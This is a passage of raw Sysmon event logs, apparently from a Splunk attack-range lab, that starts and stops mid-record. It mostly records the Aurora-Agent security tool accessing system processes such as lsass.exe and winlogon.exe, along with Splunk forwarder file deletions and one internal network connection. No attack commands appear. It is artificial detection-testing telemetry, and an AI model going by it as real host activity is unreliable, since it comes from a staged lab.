Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.781{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.698{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.696{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000015916Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:52.270{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04FC62F5C6B1E4860648D31CC65BEE07,SHA256=F56C640F642F8A7CEBFEC55D6C50D16CFE21488864FE22657A3615DD00CC6E47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:52.384{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45BA529076F0904311C4D54963D7979F,SHA256=80BEF11786A190650B75C639440B396A506DF797AEA053F3E9EDCFE006AF505E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:52.219{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000015917Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:53.336{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91CDB71C78454D7100524DCAF14BD4A6,SHA256=C3F08D81BA12E006717A955724B0350063C95C30C9F82933E1FEA65268A083DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.608{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56270-false10.0.1.12-8000- 23542300x800000000000000041183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:53.275{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05E88934427171686F8E2E4C89205E9C,SHA256=CF79CDEFC2F0EF000FB811CE0990C1A6C0D0793DA067759894044FB2958E3A01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015918Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:54.403{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C18C158D48E46A387F36C23E090D133D,SHA256=F4794BC039BF0746BE6B1F25563511663E9209A3AEAFB1C4ED7BBD05E8DCFE06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.865{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.854{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.816{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.794{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.781{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program 